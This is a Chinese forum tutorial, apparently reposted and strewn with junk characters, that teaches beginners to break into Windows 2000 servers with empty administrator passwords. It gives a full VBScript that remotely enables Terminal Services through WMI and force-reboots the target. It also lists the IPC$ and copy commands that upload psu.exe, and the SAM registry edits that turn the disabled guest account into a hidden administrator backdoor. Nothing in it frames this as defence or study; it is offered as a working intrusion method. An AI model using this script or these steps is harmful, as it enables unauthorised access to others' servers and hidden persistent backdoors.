|
一次简单的3389入侵过程
" }" N' u' \, m* S* X/ y& H原创:caozhe(草哲) ' S9 e0 G, D: b2 [& F
来源:中国欲网技术论坛--草哲
! q, k: O6 N/ @& J" v; x1 [
9 I( q8 T8 }7 K6 w \我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!
! ?* ^( W( l( _5 q* L1 N% e% E1 |. u6 S6 A& e$ ~8 C
于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!" W) l8 n G5 l
要入侵,我建议你在win2000环境下来*作!0 B/ x4 F8 R/ @2 V: v
9 f7 D [6 B$ R w3 V5 u2 r首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!& v! @8 [2 B6 ?# Q% Y
扫描的X-Scan V2.3、WINNTAutoAttack、流光!
( w8 f' I/ j, I8 |7 ^: IX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
$ I- {0 F& _) t' m. J远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)
* t& N' Q, L4 G U" P4 o' o& \% z克隆帐户用个psu就可以了~!
$ F0 n+ x$ I+ y: l/ U' v4 e
) N" L/ I# m& l4 Z0 BOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空" G; [% Z& ^/ y) H7 I/ x
运行CMD(2000下的DOS),我们给它开终端!2 w$ |) G; T8 {
命令如下!
" V" v; H; \) j$ `cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr& I7 m% |0 i8 R+ g2 U5 D) r
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)9 [& R0 a7 ^+ q( i: P; \3 v
1 b6 B- y! H7 E6 f9 Q
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!8 f% c& m' J" } [9 _
: F- B, T! T. K6 b8 m一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t3 j, \4 C( b' x6 N7 k- x8 i
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!7 ]: p3 k8 N: M( `3 J: c
( `. w0 s1 z6 N& f2 f5 S7 f
回到DOS下!我们建立IPC$连接!
9 }2 o4 A( |) [" Snet use \\120.0.0.1\ipc$ "" /user:"administrator"
2 p/ P* H7 o( } p6 n0 l" Y. c这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!3 Y- K; Z3 Y" N6 {0 Q. k, z
copy psu.exe \\120.0.0.1\admin$\system32* L4 T3 O5 l# ?5 ^, q2 s) s
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!) N h" P% E, A. O- V( c6 H/ f6 T: W
) G$ t6 w+ I1 ?2 v1 s
假设guest用户被禁用,我们就是要利用guest做后门帐户!, x, M4 g9 {' P: p" a; ~, K
在该服务器运行CMD,在命令行下输入
@% A$ R9 N# [/ D& ~8 ypsu -p regedit -i PID
9 b; }- z9 X& G! f' E
% L$ r0 C) E# c; {/ Q这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!( S6 g3 ?# o8 }4 O: |
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458* c$ R2 ^3 |( l: F" Z" N% b
那么,命令就是这样
4 F3 @1 o2 }4 K# ]/ q$ L kpsu -p regedit -i 5458
* ~$ p$ N; t* |9 ^( W, q这样直接打开注册表,可以读取本地sam的信息。
& ?" E {4 {- `( D: d打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users* B: O( O( d: d0 |- _- s- F$ I" F$ X
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!: [# Q( [5 o$ ]7 M
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
( |/ o9 `" @% w) w* q查看administrator的类型,是if4,再看guest的是if5
$ F0 g8 S/ ~% e/ x5 T# k4 a) n% C好了,知道了类型后,打开
5 d/ ^3 `! _ e5 D. e6 KHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
2 W4 A8 Q9 b6 I; k, v) w这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
; G: Z3 j% r: ~1 D* F+ u; V9 ~% k4 zHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5, y8 g/ h. ?4 Z- f- W; v: w7 }
双击右侧的F,把刚复制的粘贴到里面!
5 y ^, [3 ?. M7 {; D5 x" b
8 L) q( b. c; a- Z2 w做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5- Z* u7 X) J3 t5 e4 C
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
/ {5 B7 B( T$ e; r, l7 G Y这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
! U* [8 A( H! u( l' {; Z7 T# M8 ]) u8 L; U; s
打开CMD,在命令行下输入
* I6 i: U$ R5 S H4 L' @% Nnet user guest password- a+ ]. g/ P1 [9 n2 h
这条命令是给guest设置密码,后面的password就是密码
% k6 `/ i8 H4 J7 g/ r! r然后输入: O& y8 S5 \) `. w7 j
net user guest /active:y2 o1 f9 C9 w' _8 c! W: N
这命令是激活guest帐户,然后我们把他禁用
+ g! d# M: c+ X# ?net user guest /active:n) C; ^+ R# @5 |- D$ P" r
上面的三行命令必须在DOS下执行!+ n; u. |) l# p7 T
e9 }1 r. d) f4 z. _. M3 B( u7 F* z
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!# V3 U& a0 n* m4 d8 M
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
0 U: {6 y# G' U! j; T! P& h z4 r
8 V0 j0 o! l* {+ b5 j# r4 [注销一下,用guest登陆吧!3 L' g( |. ?! T5 I3 E' g6 Y2 Z8 r
M, x0 f4 v$ I5 f打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!
' W6 ~6 y- d1 U" e' z7 p& h6 B如果还有地方不明白的话,可以问我,我知道的一定告诉大家!6 |- V3 ?# g: a: K+ Q7 X* d
% \( X6 y4 z6 i因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!$ j* Z( Y/ j7 `/ V
5 g+ j2 u* | s {8 u- `# M' s
----------------------------------------------------------------------
# B/ G/ d* U g( a: X以下是开终端的脚本,把它存为*.vbe
?- ]) g2 S3 L% Son error resume next
2 |6 F5 R6 h m" C2 yset outstreem=wscript.stdout: k, g5 j+ y3 B/ ^
set instreem=wscript.stdin
7 g; c4 {5 t) I0 gif (lcase(right(wscript.fullname,11))="wscript.exe") then8 a. e' _/ S5 V
set objShell=wscript.createObject("wscript.shell")6 n" h- W" F$ ~. ~: ~
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
3 e9 L% S. t7 I+ Z' p T' O+ Z- Z wscript.quit
1 q; s$ V$ T6 `" m( J9 C$ Y; nend if( |9 @( n( V8 E! W! p" V
if wscript.arguments.count<3 then4 H, X7 n, C. X+ i+ }, |: _
usage()
; _% Y$ v. S: ^, t$ Z) y wscript.echo "Not enough parameters."3 X* z6 f! D1 K! _9 W
wscript.quit
5 K+ `) Y( |2 {end if
" r/ g; W( F' m% P7 k# b1 e
9 `5 ]; y% ?+ lipaddress=wscript.arguments(0)
4 q7 L: G% j* b7 v9 D( z! fusername=wscript.arguments(1)2 ?6 s1 `! [8 K3 l0 O( O$ w! V+ D' ^
password=wscript.arguments(2)
/ ^& Z- O6 @& B3 |' u: K' Mif wscript.arguments.count>3 then+ |9 z7 k8 Y' C
port=wscript.arguments(3)
0 `6 k3 b, K) uelse; P9 Q+ X; G8 f% a6 v' F* _
port=3389
! X7 R: @. K5 V$ Uend if
: @6 b, m. r s9 Z& ^5 P. c! [if not isnumeric(port) or port<1 or port>65000 then
( T+ M" [8 l. Q8 y wscript.echo "The number of port is error."( f, Y- c8 |) l% H' Y9 f
wscript.quit
6 c2 E/ g* g9 D6 ]1 O- h7 tend if
4 N, K, _- P, y& ~if wscript.arguments.count>4 then
! ]& y! j, u' d( n# J reboot=wscript.arguments(4)
) }) K! ]2 E( ^else' T3 Y% y% g8 ~
reboot=""
0 K$ G; [. h( ~end if
+ e* t+ ~& R0 Y, E4 V
' N' }/ ^3 M. x% c, W. qusage()" }8 y5 A7 b$ R. D7 u
outstreem.write "Conneting "&ipaddress&" ...."
5 b2 \ K+ S. dset objlocator=createobject("wbemscripting.swbemlocator")
5 S5 N( ]; ?0 f1 N* R: q# nset objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)& ^0 Q6 [) E# m: [' Y
showerror(err.number)- y0 I) U% U3 N( V% `
objswbemservices.security_.privileges.add 23,true
9 N% [4 Q+ m( f8 Y; mobjswbemservices.security_.privileges.add 18,true& b! X- L2 |5 A5 i7 k
& P5 @9 X$ E. e' T& O! J
outstreem.write "Checking OS type...."
2 E' r' Y' v8 o1 m. \set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
# ]: x6 I" X" T+ ~; i1 b7 kfor each objinstoscaption in colinstoscaption
5 e5 l+ S) |& y if instr(objinstoscaption.caption,"Server")>0 then
6 {$ _5 W+ i' X2 [0 M wscript.echo "OK!" S2 y, B8 }- n% y# X! T
else7 h6 G$ m; Y2 X+ ?* g- Y
wscript.echo "OS type is "&objinstoscaption.caption5 I( n8 ~& U8 Q" G/ h6 N& N
outstreem.write "Do you want to cancel setup?[y/n]"# I( Z* L7 q0 n3 s
strcancel=instreem.readline
4 t' z5 I8 S! ~' i9 G if lcase(strcancel)<>"n" then wscript.quit7 @: y3 f; T/ k) h
end if. \% t% x1 ?4 g. Y2 o
next
+ G6 a/ d! B) j/ R0 \3 @' _$ W+ d0 @: y! w
outstreem.write "Writing into registry ...."( d. ^8 x' c C- x, O! o5 {
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")6 w2 G2 z# E P3 L1 l( K# t0 l
HKLM=&h80000002
! h" f# E: O) C! f# H. UHKU=&h80000003
- {1 p" o, v! Q4 T2 f' b; c& z% ywith objinstreg2 h9 j" d" N1 D W0 h- L+ r) ]
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"9 G" O# o4 B8 x* K
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",06 p. K5 ?/ T, F+ [. r/ c
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"$ C% \8 ?% y9 u! z9 a
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",13 S9 l8 y/ R n# [& l7 P
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
; l; z T. A! c.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2* ~3 I6 Y h, |' N2 k
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",27 E6 n, S0 E. g6 C) O" j
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
6 C8 j9 [2 X- e( v0 S' t9 f3 d.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port, y, }8 U# b, ~
end with
% y0 g3 ?9 |+ oshowerror(err.number)% M1 ]9 _8 c s9 Y
1 a6 x" N4 o9 r: ]1 i) @! X! @rebt=lcase(reboot)
3 Q: o$ d* A4 C7 Pflag=0. B* g4 C* I0 j
if rebt="/r" or rebt="-r" or rebt="\r" then flag=25 t/ E2 Z1 p8 f9 V E. ]9 C
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6, y% v N8 Z. \) U2 e4 t# x( _6 ]. `
if flag<>0 then
- a1 s* G- ?# r o% p/ u0 h outstreem.write "Now, reboot target...."
% m% e' U, }6 e strwqlquery="select * from win32_operatingsystem where primary='true'"
- D" W: A/ Q" F2 l set colinstances=objswbemservices.execquery(strwqlquery)( y; t! v0 O0 H/ Q7 _, }( ~4 u
for each objinstance in colinstances2 Q* R# b$ n8 j
objinstance.win32shutdown(flag)
+ s, Z# ?. [" L7 m* d next
5 O `$ f6 O. I8 s7 t showerror(err.number)
# j5 X8 W7 B/ E0 _% helse
% _4 A5 J5 N4 ^ r) q6 e! \ wscript.echo "You need to reboot target."&vbcrlf&"Then,"
$ H7 H2 ?8 q% r- e9 w4 y$ Eend if. r" r5 k% d b
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"/ I4 h) ]4 K2 }9 i, D( @
, R& Q2 | u2 s& K+ [( n
function showerror(errornumber)" D7 M2 b+ O9 B6 b# w7 q. I
if errornumber Then
' j, u' @- } ^8 D. P# T wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
( K7 ~6 U2 k3 C& H8 Z if err.description <> "" then
4 a' @- O- S0 \( Q0 \1 P2 l wscript.echo "Error description: "&err.description&"."6 j2 a, n4 r8 U$ w, F3 ^/ L
end if
0 z7 h, p. J& ^. t! x* v; k3 M wscript.quit
; O7 _5 R- X5 X7 Yelse
# T. i5 W7 u4 l h wscript.echo "OK!"
% f7 A8 {; f# q$ z9 ~( a# _1 vend if
' I8 b+ J! M( c4 _# ?$ Rend function
0 `3 o* n2 O( @: d9 z
; D; ?' q- ]1 E7 {1 Ifunction usage()* V" h: U; u2 v
wscript.echo string(79,"*")$ G& o7 u2 _0 N; @& B* z
wscript.echo "ROTS v1.05"; D; o) \2 M* h/ Q9 a6 c
wscript.echo "Remote Open Terminal services Script, by 草哲"
+ Z, s' a% p7 z/ K* Z4 g7 bwscript.echo "Welcome to visite www.5458.net"
, P2 @# t h2 `$ c8 w( `; Vwscript.echo "Usage:"7 N2 K) D0 f3 r7 K: P! R4 P
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"9 O) [9 X* n8 S3 m+ r
wscript.echo "port: default number is 3389."
$ x: E! J# ?1 E' m* A1 y( c( Qwscript.echo "/r: auto reboot target."
, `* I. l( F8 e4 g0 ^3 Mwscript.echo "/fr: auto force reboot target."
. v* \% a/ [# o" Jwscript.echo string(79,"*")&vbcrlf
# [ R# [4 o$ Uend function
: f# Q, X' ?+ `! o* | # Z3 h1 [" l$ S+ q; Y
转自安全焦点 |
|